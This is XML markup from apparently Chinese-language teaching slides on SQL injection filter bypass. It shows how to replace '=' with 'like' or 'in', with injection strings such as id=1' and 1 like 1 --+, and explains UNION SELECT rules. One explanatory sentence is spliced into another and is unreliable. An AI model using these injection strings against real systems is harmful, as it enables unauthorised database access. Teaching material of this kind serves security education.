              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="1258515"/>
            <a:ext cx="3094312" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>代替等号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的多种方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CF1265-5E5C-4E83-87EE-A1A2C4784DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="1914037"/>
            <a:ext cx="2931460" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>代替</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF7021A-8B40-4FF4-9D20-0BC50F360D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738401" y="2722465"/>
            <a:ext cx="744734" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C65B93-0E3E-4341-AC51-59CC0F83FFAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483135" y="2693164"/>
            <a:ext cx="10871589" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id =1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id like 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id=1’ and 1=1 --+    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id=1’ and 1 like 1 --+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62460344-1669-48C3-B280-8F75A4B05D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848900" y="4209047"/>
            <a:ext cx="1192963" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>③ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A421DC-09FF-4B77-A293-631C5417DEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508294" y="4806383"/>
            <a:ext cx="10821270" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id in(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id =1' and 1=1--+       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> id=1' and 1 in(1) --+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12631D32-770A-4D5D-B5B6-09A0AEC77E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="4809712"/>
            <a:ext cx="744734" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4089440467"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
